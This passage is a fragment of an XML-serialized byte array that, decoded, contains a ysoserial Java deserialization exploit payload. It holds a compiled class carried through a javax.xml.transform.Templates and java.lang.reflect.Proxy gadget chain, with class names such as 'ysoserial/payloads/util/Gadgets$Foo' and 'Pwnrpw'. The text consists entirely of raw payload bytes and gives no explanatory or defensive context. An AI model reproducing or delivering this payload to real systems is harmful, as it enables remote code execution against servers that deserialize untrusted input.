index=\"2409\"><byte>0</byte></void><void index=\"2410\"><byte>0</byte></void><void index=\"2411\"><byte>0</byte></void><void index=\"2412\"><byte>6</byte></void><void index=\"2413\"><byte>0</byte></void><void index=\"2414\"><byte>1</byte></void><void index=\"2415\"><byte>0</byte></void><void index=\"2416\"><byte>0</byte></void><void index=\"2417\"><byte>0</byte></void><void index=\"2418\"><byte>50</byte></void><void index=\"2419\"><byte>0</byte></void><void index=\"2420\"><byte>14</byte></void><void index=\"2421\"><byte>0</byte></void><void index=\"2422\"><byte>0</byte></void><void index=\"2423\"><byte>0</byte></void><void index=\"2424\"><byte>42</byte></void><void index=\"2425\"><byte>0</byte></void><void index=\"2426\"><byte>4</byte></void><void index=\"2427\"><byte>0</byte></void><void index=\"2428\"><byte>0</byte></void><void index=\"2429\"><byte>0</byte></void><void index=\"2430\"><byte>1</byte></void><void index=\"2431\"><byte>0</byte></void><void index=\"2432\"><byte>15</byte></void><void index=\"2433\"><byte>0</byte></void><void index=\"2434\"><byte>98</byte></void><void index=\"2435\"><byte>0</byte></void><void index=\"2436\"><byte>0</byte></void><void index=\"2437\"><byte>0</byte></void><void index=\"2438\"><byte>0</byte></void><void index=\"2439\"><byte>0</byte></void><void index=\"2440\"><byte>1</byte></void><void index=\"2441\"><byte>0</byte></void><void index=\"2442\"><byte>21</byte></void><void index=\"2443\"><byte>0</byte></void><void index=\"2444\"><byte>22</byte></void><void index=\"2445\"><byte>0</byte></void><void index=\"2446\"><byte>1</byte></void><void index=\"2447\"><byte>0</byte></void><void index=\"2448\"><byte>0</byte></void><void index=\"2449\"><byte>0</byte></void><void index=\"2450\"><byte>1</byte></void><void index=\"2451\"><byte>0</byte></void><void index=\"2452\"><byte>28</byte></void><void index=\"2453\"><byte>0</byte></void><void index=\"2454\"><byte>29</byte></void><void index=\"2455\"><byte>0</byte></void><void index=\"2456\"><byte>2</byte></void><void index=\"2457\"><byte>0</byte></void><void index=\"2458\"><byte>0</byte></void><void index=\"2459\"><byte>0</byte></void><void index=\"2460\"><byte>1</byte></void><void index=\"2461\"><byte>0</byte></void><void index=\"2462\"><byte>30</byte></void><void index=\"2463\"><byte>0</byte></void><void index=\"2464\"><byte>31</byte></void><void index=\"2465\"><byte>0</byte></void><void index=\"2466\"><byte>3</byte></void><void index=\"2467\"><byte>0</byte></void><void index=\"2468\"><byte>25</byte></void><void index=\"2469\"><byte>0</byte></void><void index=\"2470\"><byte>0</byte></void><void index=\"2471\"><byte>0</byte></void><void index=\"2472\"><byte>4</byte></void><void index=\"2473\"><byte>0</byte></void><void index=\"2474\"><byte>1</byte></void><void index=\"2475\"><byte>0</byte></void><void index=\"2476\"><byte>26</byte></void><void index=\"2477\"><byte>0</byte></void><void index=\"2478\"><byte>8</byte></void><void index=\"2479\"><byte>0</byte></void><void index=\"2480\"><byte>41</byte></void><void index=\"2481\"><byte>0</byte></void><void index=\"2482\"><byte>11</byte></void><void index=\"2483\"><byte>0</byte></void><void index=\"2484\"><byte>1</byte></void><void index=\"2485\"><byte>0</byte></void><void index=\"2486\"><byte>12</byte></void><void index=\"2487\"><byte>0</byte></void><void index=\"2488\"><byte>0</byte></void><void index=\"2489\"><byte>0</byte></void><void index=\"2490\"><byte>81</byte></void><void index=\"2491\"><byte>0</byte></void><void index=\"2492\"><byte>6</byte></void><void index=\"2493\"><byte>0</byte></void><void index=\"2494\"><byte>2</byte></void><void index=\"2495\"><byte>0</byte></void><void index=\"2496\"><byte>0</byte></void><void index=\"2497\"><byte>0</byte></void><void index=\"2498\"><byte>60</byte></void><void index=\"2499\"><byte>-89</byte></void><void index=\"2500\"><byte>0</byte></void><void index=\"2501\"><byte>3</byte></void><void index=\"2502\"><byte>1</byte></void><void index=\"2503\"><byte>76</byte></void><void index=\"2504\"><byte>-69</byte></void><void index=\"2505\"><byte>0</byte></void><void index=\"2506\"><byte>43</byte></void><void index=\"2507\"><byte>89</byte></void><void index=\"2508\"><byte>-69</byte></void><void index=\"2509\"><byte>0</byte></void><void index=\"2510\"><byte>45</byte></void><void index=\"2511\"><byte>89</byte></void><void index=\"2512\"><byte>-73</byte></void><void index=\"2513\"><byte>0</byte></void><void index=\"2514\"><byte>46</byte></void><void index=\"2515\"><byte>-72</byte></void><void index=\"2516\"><byte>0</byte></void><void index=\"2517\"><byte>52</byte></void><void index=\"2518\"><byte>-74</byte></void><void index=\"2519\"><byte>0</byte></void><void index=\"2520\"><byte>56</byte></void><void index=\"2521\"><byte>18</byte></void><void index=\"2522\"><byte>58</byte></void><void index=\"2523\"><byte>-74</byte></void><void index=\"2524\"><byte>0</byte></void><void index=\"2525\"><byte>64</byte></void><void index=\"2526\"><byte>-74</byte></void><void index=\"2527\"><byte>0</byte></void><void index=\"2528\"><byte>70</byte></void><void index=\"2529\"><byte>-74</byte></void><void index=\"2530\"><byte>0</byte></void><void index=\"2531\"><byte>74</byte></void><void index=\"2532\"><byte>18</byte></void><void index=\"2533\"><byte>76</byte></void><void index=\"2534\"><byte>-74</byte></void><void index=\"2535\"><byte>0</byte></void><void index=\"2536\"><byte>74</byte></void><void index=\"2537\"><byte>-74</byte></void><void index=\"2538\"><byte>0</byte></void><void index=\"2539\"><byte>79</byte></void><void index=\"2540\"><byte>-73</byte></void><void index=\"2541\"><byte>0</byte></void><void index=\"2542\"><byte>82</byte></void><void index=\"2543\"><byte>-69</byte></void><void index=\"2544\"><byte>0</byte></void><void index=\"2545\"><byte>84</byte></void><void index=\"2546\"><byte>89</byte></void><void index=\"2547\"><byte>18</byte></void><void index=\"2548\"><byte>86</byte></void><void index=\"2549\"><byte>-73</byte></void><void index=\"2550\"><byte>0</byte></void><void index=\"2551\"><byte>87</byte></void><void index=\"2552\"><byte>-74</byte></void><void index=\"2553\"><byte>0</byte></void><void index=\"2554\"><byte>92</byte></void><void index=\"2555\"><byte>-74</byte></void><void index=\"2556\"><byte>0</byte></void><void index=\"2557\"><byte>95</byte></void><void index=\"2558\"><byte>-79</byte></void><void index=\"2559\"><byte>0</byte></void><void index=\"2560\"><byte>0</byte></void><void index=\"2561\"><byte>0</byte></void><void index=\"2562\"><byte>1</byte></void><void index=\"2563\"><byte>0</byte></void><void index=\"2564\"><byte>96</byte></void><void index=\"2565\"><byte>0</byte></void><void index=\"2566\"><byte>0</byte></void><void index=\"2567\"><byte>0</byte></void><void index=\"2568\"><byte>3</byte></void><void index=\"2569\"><byte>0</byte></void><void index=\"2570\"><byte>1</byte></void><void index=\"2571\"><byte>3</byte></void><void index=\"2572\"><byte>0</byte></void><void index=\"2573\"><byte>2</byte></void><void index=\"2574\"><byte>0</byte></void><void index=\"2575\"><byte>32</byte></void><void index=\"2576\"><byte>0</byte></void><void index=\"2577\"><byte>0</byte></void><void index=\"2578\"><byte>0</byte></void><void index=\"2579\"><byte>2</byte></void><void index=\"2580\"><byte>0</byte></void><void index=\"2581\"><byte>33</byte></void><void index=\"2582\"><byte>0</byte></void><void index=\"2583\"><byte>17</byte></void><void index=\"2584\"><byte>0</byte></void><void index=\"2585\"><byte>0</byte></void><void index=\"2586\"><byte>0</byte></void><void index=\"2587\"><byte>10</byte></void><void index=\"2588\"><byte>0</byte></void><void index=\"2589\"><byte>1</byte></void><void index=\"2590\"><byte>0</byte></void><void index=\"2591\"><byte>2</byte></void><void index=\"2592\"><byte>0</byte></void><void index=\"2593\"><byte>35</byte></void><void index=\"2594\"><byte>0</byte></void><void index=\"2595\"><byte>16</byte></void><void index=\"2596\"><byte>0</byte></void><void index=\"2597\"><byte>9</byte></void><void index=\"2598\"><byte>117</byte></void><void index=\"2599\"><byte>113</byte></void><void index=\"2600\"><byte>0</byte></void><void index=\"2601\"><byte>126</byte></void><void index=\"2602\"><byte>0</byte></void><void index=\"2603\"><byte>11</byte></void><void index=\"2604\"><byte>0</byte></void><void index=\"2605\"><byte>0</byte></void><void index=\"2606\"><byte>1</byte></void><void index=\"2607\"><byte>-44</byte></void><void index=\"2608\"><byte>-54</byte></void><void index=\"2609\"><byte>-2</byte></void><void index=\"2610\"><byte>-70</byte></void><void index=\"2611\"><byte>-66</byte></void><void index=\"2612\"><byte>0</byte></void><void index=\"2613\"><byte>0</byte></void><void index=\"2614\"><byte>0</byte></void><void index=\"2615\"><byte>50</byte></void><void index=\"2616\"><byte>0</byte></void><void index=\"2617\"><byte>27</byte></void><void index=\"2618\"><byte>10</byte></void><void index=\"2619\"><byte>0</byte></void><void index=\"2620\"><byte>3</byte></void><void index=\"2621\"><byte>0</byte></void><void index=\"2622\"><byte>21</byte></void><void index=\"2623\"><byte>7</byte></void><void index=\"2624\"><byte>0</byte></void><void index=\"2625\"><byte>23</byte></void><void index=\"2626\"><byte>7</byte></void><void index=\"2627\"><byte>0</byte></void><void index=\"2628\"><byte>24</byte></void><void index=\"2629\"><byte>7</byte></void><void index=\"2630\"><byte>0</byte></void><void index=\"2631\"><byte>25</byte></void><void index=\"2632\"><byte>1</byte></void><void index=\"2633\"><byte>0</byte></void><void index=\"2634\"><byte>16</byte></void><void index=\"2635\"><byte>115</byte></void><void index=\"2636\"><byte>101</byte></void><void index=\"2637\"><byte>114</byte></void><void index=\"2638\"><byte>105</byte></void><void index=\"2639\"><byte>97</byte></void><void index=\"2640\"><byte>108</byte></void><void index=\"2641\"><byte>86</byte></void><void index=\"2642\"><byte>101</byte></void><void index=\"2643\"><byte>114</byte></void><void index=\"2644\"><byte>115</byte></void><void index=\"2645\"><byte>105</byte></void><void index=\"2646\"><byte>111</byte></void><void index=\"2647\"><byte>110</byte></void><void index=\"2648\"><byte>85</byte></void><void index=\"2649\"><byte>73</byte></void><void index=\"2650\"><byte>68</byte></void><void index=\"2651\"><byte>1</byte></void><void index=\"2652\"><byte>0</byte></void><void index=\"2653\"><byte>1</byte></void><void index=\"2654\"><byte>74</byte></void><void index=\"2655\"><byte>1</byte></void><void index=\"2656\"><byte>0</byte></void><void index=\"2657\"><byte>13</byte></void><void index=\"2658\"><byte>67</byte></void><void index=\"2659\"><byte>111</byte></void><void index=\"2660\"><byte>110</byte></void><void index=\"2661\"><byte>115</byte></void><void index=\"2662\"><byte>116</byte></void><void index=\"2663\"><byte>97</byte></void><void index=\"2664\"><byte>110</byte></void><void index=\"2665\"><byte>116</byte></void><void index=\"2666\"><byte>86</byte></void><void index=\"2667\"><byte>97</byte></void><void index=\"2668\"><byte>108</byte></void><void index=\"2669\"><byte>117</byte></void><void index=\"2670\"><byte>101</byte></void><void index=\"2671\"><byte>5</byte></void><void index=\"2672\"><byte>113</byte></void><void index=\"2673\"><byte>-26</byte></void><void index=\"2674\"><byte>105</byte></void><void index=\"2675\"><byte>-18</byte></void><void index=\"2676\"><byte>60</byte></void><void index=\"2677\"><byte>109</byte></void><void index=\"2678\"><byte>71</byte></void><void index=\"2679\"><byte>24</byte></void><void index=\"2680\"><byte>1</byte></void><void index=\"2681\"><byte>0</byte></void><void index=\"2682\"><byte>6</byte></void><void index=\"2683\"><byte>60</byte></void><void index=\"2684\"><byte>105</byte></void><void index=\"2685\"><byte>110</byte></void><void index=\"2686\"><byte>105</byte></void><void index=\"2687\"><byte>116</byte></void><void index=\"2688\"><byte>62</byte></void><void index=\"2689\"><byte>1</byte></void><void index=\"2690\"><byte>0</byte></void><void index=\"2691\"><byte>3</byte></void><void index=\"2692\"><byte>40</byte></void><void index=\"2693\"><byte>41</byte></void><void index=\"2694\"><byte>86</byte></void><void index=\"2695\"><byte>1</byte></void><void index=\"2696\"><byte>0</byte></void><void index=\"2697\"><byte>4</byte></void><void index=\"2698\"><byte>67</byte></void><void index=\"2699\"><byte>111</byte></void><void index=\"2700\"><byte>100</byte></void><void index=\"2701\"><byte>101</byte></void><void index=\"2702\"><byte>1</byte></void><void index=\"2703\"><byte>0</byte></void><void index=\"2704\"><byte>15</byte></void><void index=\"2705\"><byte>76</byte></void><void index=\"2706\"><byte>105</byte></void><void index=\"2707\"><byte>110</byte></void><void index=\"2708\"><byte>101</byte></void><void index=\"2709\"><byte>78</byte></void><void index=\"2710\"><byte>117</byte></void><void index=\"2711\"><byte>109</byte></void><void index=\"2712\"><byte>98</byte></void><void index=\"2713\"><byte>101</byte></void><void index=\"2714\"><byte>114</byte></void><void index=\"2715\"><byte>84</byte></void><void index=\"2716\"><byte>97</byte></void><void index=\"2717\"><byte>98</byte></void><void index=\"2718\"><byte>108</byte></void><void index=\"2719\"><byte>101</byte></void><void index=\"2720\"><byte>1</byte></void><void index=\"2721\"><byte>0</byte></void><void index=\"2722\"><byte>18</byte></void><void index=\"2723\"><byte>76</byte></void><void index=\"2724\"><byte>111</byte></void><void index=\"2725\"><byte>99</byte></void><void index=\"2726\"><byte>97</byte></void><void index=\"2727\"><byte>108</byte></void><void index=\"2728\"><byte>86</byte></void><void index=\"2729\"><byte>97</byte></void><void index=\"2730\"><byte>114</byte></void><void index=\"2731\"><byte>105</byte></void><void index=\"2732\"><byte>97</byte></void><void index=\"2733\"><byte>98</byte></void><void index=\"2734\"><byte>108</byte></void><void index=\"2735\"><byte>101</byte></void><void index=\"2736\"><byte>84</byte></void><void index=\"2737\"><byte>97</byte></void><void index=\"2738\"><byte>98</byte></void><void index=\"2739\"><byte>108</byte></void><void index=\"2740\"><byte>101</byte></void><void index=\"2741\"><byte>1</byte></void><void index=\"2742\"><byte>0</byte></void><void index=\"2743\"><byte>4</byte></void><void index=\"2744\"><byte>116</byte></void><void index=\"2745\"><byte>104</byte></void><void index=\"2746\"><byte>105</byte></void><void index=\"2747\"><byte>115</byte></void><void index=\"2748\"><byte>1</byte></void><void index=\"2749\"><byte>0</byte></void><void index=\"2750\"><byte>3</byte></void><void index=\"2751\"><byte>70</byte></void><void index=\"2752\"><byte>111</byte></void><void index=\"2753\"><byte>111</byte></void><void index=\"2754\"><byte>1</byte></void><void index=\"2755\"><byte>0</byte></void><void index=\"2756\"><byte>12</byte></void><void index=\"2757\"><byte>73</byte></void><void index=\"2758\"><byte>110</byte></void><void index=\"2759\"><byte>110</byte></void><void index=\"2760\"><byte>101</byte></void><void index=\"2761\"><byte>114</byte></void><void index=\"2762\"><byte>67</byte></void><void index=\"2763\"><byte>108</byte></void><void index=\"2764\"><byte>97</byte></void><void index=\"2765\"><byte>115</byte></void><void index=\"2766\"><byte>115</byte></void><void index=\"2767\"><byte>101</byte></void><void index=\"2768\"><byte>115</byte></void><void index=\"2769\"><byte>1</byte></void><void index=\"2770\"><byte>0</byte></void><void index=\"2771\"><byte>37</byte></void><void index=\"2772\"><byte>76</byte></void><void index=\"2773\"><byte>121</byte></void><void index=\"2774\"><byte>115</byte></void><void index=\"2775\"><byte>111</byte></void><void index=\"2776\"><byte>115</byte></void><void index=\"2777\"><byte>101</byte></void><void index=\"2778\"><byte>114</byte></void><void index=\"2779\"><byte>105</byte></void><void index=\"2780\"><byte>97</byte></void><void index=\"2781\"><byte>108</byte></void><void index=\"2782\"><byte>47</byte></void><void index=\"2783\"><byte>112</byte></void><void index=\"2784\"><byte>97</byte></void><void index=\"2785\"><byte>121</byte></void><void index=\"2786\"><byte>108</byte></void><void index=\"2787\"><byte>111</byte></void><void index=\"2788\"><byte>97</byte></void><void index=\"2789\"><byte>100</byte></void><void index=\"2790\"><byte>115</byte></void><void index=\"2791\"><byte>47</byte></void><void index=\"2792\"><byte>117</byte></void><void index=\"2793\"><byte>116</byte></void><void index=\"2794\"><byte>105</byte></void><void index=\"2795\"><byte>108</byte></void><void index=\"2796\"><byte>47</byte></void><void index=\"2797\"><byte>71</byte></void><void index=\"2798\"><byte>97</byte></void><void index=\"2799\"><byte>100</byte></void><void index=\"2800\"><byte>103</byte></void><void index=\"2801\"><byte>101</byte></void><void index=\"2802\"><byte>116</byte></void><void index=\"2803\"><byte>115</byte></void><void index=\"2804\"><byte>36</byte></void><void index=\"2805\"><byte>70</byte></void><void index=\"2806\"><byte>111</byte></void><void index=\"2807\"><byte>111</byte></void><void index=\"2808\"><byte>59</byte></void><void index=\"2809\"><byte>1</byte></void><void index=\"2810\"><byte>0</byte></void><void index=\"2811\"><byte>10</byte></void><void index=\"2812\"><byte>83</byte></void><void index=\"2813\"><byte>111</byte></void><void index=\"2814\"><byte>117</byte></void><void index=\"2815\"><byte>114</byte></void><void index=\"2816\"><byte>99</byte></void><void index=\"2817\"><byte>101</byte></void><void index=\"2818\"><byte>70</byte></void><void index=\"2819\"><byte>105</byte></void><void index=\"2820\"><byte>108</byte></void><void index=\"2821\"><byte>101</byte></void><void index=\"2822\"><byte>1</byte></void><void index=\"2823\"><byte>0</byte></void><void index=\"2824\"><byte>12</byte></void><void index=\"2825\"><byte>71</byte></void><void index=\"2826\"><byte>97</byte></void><void index=\"2827\"><byte>100</byte></void><void index=\"2828\"><byte>103</byte></void><void index=\"2829\"><byte>101</byte></void><void index=\"2830\"><byte>116</byte></void><void index=\"2831\"><byte>115</byte></void><void index=\"2832\"><byte>46</byte></void><void index=\"2833\"><byte>106</byte></void><void index=\"2834\"><byte>97</byte></void><void index=\"2835\"><byte>118</byte></void><void index=\"2836\"><byte>97</byte></void><void index=\"2837\"><byte>12</byte></void><void index=\"2838\"><byte>0</byte></void><void index=\"2839\"><byte>10</byte></void><void index=\"2840\"><byte>0</byte></void><void index=\"2841\"><byte>11</byte></void><void index=\"2842\"><byte>7</byte></void><void index=\"2843\"><byte>0</byte></void><void index=\"2844\"><byte>26</byte></void><void index=\"2845\"><byte>1</byte></void><void index=\"2846\"><byte>0</byte></void><void index=\"2847\"><byte>35</byte></void><void index=\"2848\"><byte>121</byte></void><void index=\"2849\"><byte>115</byte></void><void index=\"2850\"><byte>111</byte></void><void index=\"2851\"><byte>115</byte></void><void index=\"2852\"><byte>101</byte></void><void index=\"2853\"><byte>114</byte></void><void index=\"2854\"><byte>105</byte></void><void index=\"2855\"><byte>97</byte></void><void index=\"2856\"><byte>108</byte></void><void index=\"2857\"><byte>47</byte></void><void index=\"2858\"><byte>112</byte></void><void index=\"2859\"><byte>97</byte></void><void index=\"2860\"><byte>121</byte></void><void index=\"2861\"><byte>108</byte></void><void index=\"2862\"><byte>111</byte></void><void index=\"2863\"><byte>97</byte></void><void index=\"2864\"><byte>100</byte></void><void index=\"2865\"><byte>115</byte></void><void index=\"2866\"><byte>47</byte></void><void index=\"2867\"><byte>117</byte></void><void index=\"2868\"><byte>116</byte></void><void index=\"2869\"><byte>105</byte></void><void index=\"2870\"><byte>108</byte></void><void index=\"2871\"><byte>47</byte></void><void index=\"2872\"><byte>71</byte></void><void index=\"2873\"><byte>97</byte></void><void index=\"2874\"><byte>100</byte></void><void index=\"2875\"><byte>103</byte></void><void index=\"2876\"><byte>101</byte></void><void index=\"2877\"><byte>116</byte></void><void index=\"2878\"><byte>115</byte></void><void index=\"2879\"><byte>36</byte></void><void index=\"2880\"><byte>70</byte></void><void index=\"2881\"><byte>111</byte></void><void index=\"2882\"><byte>111</byte></void><void index=\"2883\"><byte>1</byte></void><void index=\"2884\"><byte>0</byte></void><void index=\"2885\"><byte>16</byte></void><void index=\"2886\"><byte>106</byte></void><void index=\"2887\"><byte>97</byte></void><void index=\"2888\"><byte>118</byte></void><void index=\"2889\"><byte>97</byte></void><void index=\"2890\"><byte>47</byte></void><void index=\"2891\"><byte>108</byte></void><void index=\"2892\"><byte>97</byte></void><void index=\"2893\"><byte>110</byte></void><void index=\"2894\"><byte>103</byte></void><void index=\"2895\"><byte>47</byte></void><void index=\"2896\"><byte>79</byte></void><void index=\"2897\"><byte>98</byte></void><void index=\"2898\"><byte>106</byte></void><void index=\"2899\"><byte>101</byte></void><void index=\"2900\"><byte>99</byte></void><void index=\"2901\"><byte>116</byte></void><void index=\"2902\"><byte>1</byte></void><void index=\"2903\"><byte>0</byte></void><void index=\"2904\"><byte>20</byte></void><void index=\"2905\"><byte>106</byte></void><void index=\"2906\"><byte>97</byte></void><void index=\"2907\"><byte>118</byte></void><void index=\"2908\"><byte>97</byte></void><void index=\"2909\"><byte>47</byte></void><void index=\"2910\"><byte>105</byte></void><void index=\"2911\"><byte>111</byte></void><void index=\"2912\"><byte>47</byte></void><void index=\"2913\"><byte>83</byte></void><void index=\"2914\"><byte>101</byte></void><void index=\"2915\"><byte>114</byte></void><void index=\"2916\"><byte>105</byte></void><void index=\"2917\"><byte>97</byte></void><void index=\"2918\"><byte>108</byte></void><void index=\"2919\"><byte>105</byte></void><void index=\"2920\"><byte>122</byte></void><void index=\"2921\"><byte>97</byte></void><void index=\"2922\"><byte>98</byte></void><void index=\"2923\"><byte>108</byte></void><void index=\"2924\"><byte>101</byte></void><void index=\"2925\"><byte>1</byte></void><void index=\"2926\"><byte>0</byte></void><void index=\"2927\"><byte>31</byte></void><void index=\"2928\"><byte>121</byte></void><void index=\"2929\"><byte>115</byte></void><void index=\"2930\"><byte>111</byte></void><void index=\"2931\"><byte>115</byte></void><void index=\"2932\"><byte>101</byte></void><void index=\"2933\"><byte>114</byte></void><void index=\"2934\"><byte>105</byte></void><void index=\"2935\"><byte>97</byte></void><void index=\"2936\"><byte>108</byte></void><void index=\"2937\"><byte>47</byte></void><void index=\"2938\"><byte>112</byte></void><void index=\"2939\"><byte>97</byte></void><void index=\"2940\"><byte>121</byte></void><void index=\"2941\"><byte>108</byte></void><void index=\"2942\"><byte>111</byte></void><void index=\"2943\"><byte>97</byte></void><void index=\"2944\"><byte>100</byte></void><void index=\"2945\"><byte>115</byte></void><void index=\"2946\"><byte>47</byte></void><void index=\"2947\"><byte>117</byte></void><void index=\"2948\"><byte>116</byte></void><void index=\"2949\"><byte>105</byte></void><void index=\"2950\"><byte>108</byte></void><void index=\"2951\"><byte>47</byte></void><void index=\"2952\"><byte>71</byte></void><void index=\"2953\"><byte>97</byte></void><void index=\"2954\"><byte>100</byte></void><void index=\"2955\"><byte>103</byte></void><void index=\"2956\"><byte>101</byte></void><void index=\"2957\"><byte>116</byte></void><void index=\"2958\"><byte>115</byte></void><void index=\"2959\"><byte>0</byte></void><void index=\"2960\"><byte>33</byte></void><void index=\"2961\"><byte>0</byte></void><void index=\"2962\"><byte>2</byte></void><void index=\"2963\"><byte>0</byte></void><void index=\"2964\"><byte>3</byte></void><void index=\"2965\"><byte>0</byte></void><void index=\"2966\"><byte>1</byte></void><void index=\"2967\"><byte>0</byte></void><void index=\"2968\"><byte>4</byte></void><void index=\"2969\"><byte>0</byte></void><void index=\"2970\"><byte>1</byte></void><void index=\"2971\"><byte>0</byte></void><void index=\"2972\"><byte>26</byte></void><void index=\"2973\"><byte>0</byte></void><void index=\"2974\"><byte>5</byte></void><void index=\"2975\"><byte>0</byte></void><void index=\"2976\"><byte>6</byte></void><void index=\"2977\"><byte>0</byte></void><void index=\"2978\"><byte>1</byte></void><void index=\"2979\"><byte>0</byte></void><void index=\"2980\"><byte>7</byte></void><void index=\"2981\"><byte>0</byte></void><void index=\"2982\"><byte>0</byte></void><void index=\"2983\"><byte>0</byte></void><void index=\"2984\"><byte>2</byte></void><void index=\"2985\"><byte>0</byte></void><void index=\"2986\"><byte>8</byte></void><void index=\"2987\"><byte>0</byte></void><void index=\"2988\"><byte>1</byte></void><void index=\"2989\"><byte>0</byte></void><void index=\"2990\"><byte>1</byte></void><void index=\"2991\"><byte>0</byte></void><void index=\"2992\"><byte>10</byte></void><void index=\"2993\"><byte>0</byte></void><void index=\"2994\"><byte>11</byte></void><void index=\"2995\"><byte>0</byte></void><void index=\"2996\"><byte>1</byte></void><void index=\"2997\"><byte>0</byte></void><void index=\"2998\"><byte>12</byte></void><void index=\"2999\"><byte>0</byte></void><void index=\"3000\"><byte>0</byte></void><void index=\"3001\"><byte>0</byte></void><void index=\"3002\"><byte>47</byte></void><void index=\"3003\"><byte>0</byte></void><void index=\"3004\"><byte>1</byte></void><void index=\"3005\"><byte>0</byte></void><void index=\"3006\"><byte>1</byte></void><void index=\"3007\"><byte>0</byte></void><void index=\"3008\"><byte>0</byte></void><void index=\"3009\"><byte>0</byte></void><void index=\"3010\"><byte>5</byte></void><void index=\"3011\"><byte>42</byte></void><void index=\"3012\"><byte>-73</byte></void><void index=\"3013\"><byte>0</byte></void><void index=\"3014\"><byte>1</byte></void><void index=\"3015\"><byte>-79</byte></void><void index=\"3016\"><byte>0</byte></void><void index=\"3017\"><byte>0</byte></void><void index=\"3018\"><byte>0</byte></void><void index=\"3019\"><byte>2</byte></void><void index=\"3020\"><byte>0</byte></void><void index=\"3021\"><byte>13</byte></void><void index=\"3022\"><byte>0</byte></void><void index=\"3023\"><byte>0</byte></void><void index=\"3024\"><byte>0</byte></void><void index=\"3025\"><byte>6</byte></void><void index=\"3026\"><byte>0</byte></void><void index=\"3027\"><byte>1</byte></void><void index=\"3028\"><byte>0</byte></void><void index=\"3029\"><byte>0</byte></void><void index=\"3030\"><byte>0</byte></void><void index=\"3031\"><byte>54</byte></void><void index=\"3032\"><byte>0</byte></void><void index=\"3033\"><byte>14</byte></void><void index=\"3034\"><byte>0</byte></void><void index=\"3035\"><byte>0</byte></void><void index=\"3036\"><byte>0</byte></void><void index=\"3037\"><byte>12</byte></void><void index=\"3038\"><byte>0</byte></void><void index=\"3039\"><byte>1</byte></void><void index=\"3040\"><byte>0</byte></void><void index=\"3041\"><byte>0</byte></void><void index=\"3042\"><byte>0</byte></void><void index=\"3043\"><byte>5</byte></void><void index=\"3044\"><byte>0</byte></void><void index=\"3045\"><byte>15</byte></void><void index=\"3046\"><byte>0</byte></void><void index=\"3047\"><byte>18</byte></void><void index=\"3048\"><byte>0</byte></void><void index=\"3049\"><byte>0</byte></void><void index=\"3050\"><byte>0</byte></void><void index=\"3051\"><byte>2</byte></void><void index=\"3052\"><byte>0</byte></void><void index=\"3053\"><byte>19</byte></void><void index=\"3054\"><byte>0</byte></void><void index=\"3055\"><byte>0</byte></void><void index=\"3056\"><byte>0</byte></void><void index=\"3057\"><byte>2</byte></void><void index=\"3058\"><byte>0</byte></void><void index=\"3059\"><byte>20</byte></void><void index=\"3060\"><byte>0</byte></void><void index=\"3061\"><byte>17</byte></void><void index=\"3062\"><byte>0</byte></void><void index=\"3063\"><byte>0</byte></void><void index=\"3064\"><byte>0</byte></void><void index=\"3065\"><byte>10</byte></void><void index=\"3066\"><byte>0</byte></void><void index=\"3067\"><byte>1</byte></void><void index=\"3068\"><byte>0</byte></void><void index=\"3069\"><byte>2</byte></void><void index=\"3070\"><byte>0</byte></void><void index=\"3071\"><byte>22</byte></void><void index=\"3072\"><byte>0</byte></void><void index=\"3073\"><byte>16</byte></void><void index=\"3074\"><byte>0</byte></void><void index=\"3075\"><byte>9</byte></void><void index=\"3076\"><byte>112</byte></void><void index=\"3077\"><byte>116</byte></void><void index=\"3078\"><byte>0</byte></void><void index=\"3079\"><byte>4</byte></void><void index=\"3080\"><byte>80</byte></void><void index=\"3081\"><byte>119</byte></void><void index=\"3082\"><byte>110</byte></void><void index=\"3083\"><byte>114</byte></void><void index=\"3084\"><byte>112</byte></void><void index=\"3085\"><byte>119</byte></void><void index=\"3086\"><byte>1</byte></void><void index=\"3087\"><byte>0</byte></void><void index=\"3088\"><byte>120</byte></void><void index=\"3089\"><byte>115</byte></void><void index=\"3090\"><byte>125</byte></void><void index=\"3091\"><byte>0</byte></void><void index=\"3092\"><byte>0</byte></void><void index=\"3093\"><byte>0</byte></void><void index=\"3094\"><byte>1</byte></void><void index=\"3095\"><byte>0</byte></void><void index=\"3096\"><byte>29</byte></void><void index=\"3097\"><byte>106</byte></void><void index=\"3098\"><byte>97</byte></void><void index=\"3099\"><byte>118</byte></void><void index=\"3100\"><byte>97</byte></void><void index=\"3101\"><byte>120</byte></void><void index=\"3102\"><byte>46</byte></void><void index=\"3103\"><byte>120</byte></void><void index=\"3104\"><byte>109</byte></void><void index=\"3105\"><byte>108</byte></void><void index=\"3106\"><byte>46</byte></void><void index=\"3107\"><byte>116</byte></void><void index=\"3108\"><byte>114</byte></void><void index=\"3109\"><byte>97</byte></void><void index=\"3110\"><byte>110</byte></void><void index=\"3111\"><byte>115</byte></void><void index=\"3112\"><byte>102</byte></void><void index=\"3113\"><byte>111</byte></void><void index=\"3114\"><byte>114</byte></void><void index=\"3115\"><byte>109</byte></void><void index=\"3116\"><byte>46</byte></void><void index=\"3117\"><byte>84</byte></void><void index=\"3118\"><byte>101</byte></void><void index=\"3119\"><byte>109</byte></void><void index=\"3120\"><byte>112</byte></void><void index=\"3121\"><byte>108</byte></void><void index=\"3122\"><byte>97</byte></void><void index=\"3123\"><byte>116</byte></void><void index=\"3124\"><byte>101</byte></void><void index=\"3125\"><byte>115</byte></void><void index=\"3126\"><byte>120</byte></void><void index=\"3127\"><byte>114</byte></void><void index=\"3128\"><byte>0</byte></void><void index=\"3129\"><byte>23</byte></void><void index=\"3130\"><byte>106</byte></void><void index=\"3131\"><byte>97</byte></void><void index=\"3132\"><byte>118</byte></void><void index=\"3133\"><byte>97</byte></void><void index=\"3134\"><byte>46</byte></void><void index=\"3135\"><byte>108</byte></void><void index=\"3136\"><byte>97</byte></void><void index=\"3137\"><byte>110</byte></void><void index=\"3138\"><byte>103</byte></void><void index=\"3139\"><byte>46</byte></void><void index=\"3140\"><byte>114</byte></void><void index=\"3141\"><byte>101</byte></void><void index=\"3142\"><byte>102</byte></void><void index=\"3143\"><byte>108</byte></void><void index=\"3144\"><byte>101</byte></void><void index=\"3145\"><byte>99</byte></void><void index=\"3146\"><byte>116</byte></void><void index=\"3147\"><byte>46</byte></void><void index=\"3148\"><byte>80</byte></void><void index=\"3149\"><byte>114</byte></void><void index=\"3150\"><byte>111</byte></void><void index=\"3151\"><byte>120</byte></void><void index=\"3152\"><byte>121</byte></void><void index=\"3153\"><byte>-31</byte></void><void index=\"3154\"><byte>39</byte></void><void index=\"3155\"><byte>-38</byte></void><void index=\"3156\"><byte>32</byte></void><void 